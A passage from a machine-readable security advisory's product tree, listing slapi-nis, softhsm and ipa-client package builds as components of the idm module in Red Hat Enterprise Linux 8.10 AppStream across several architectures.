"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
"product_reference": "idm:client:8100020240417004735:143e9e98",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src"
},
"product_reference": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
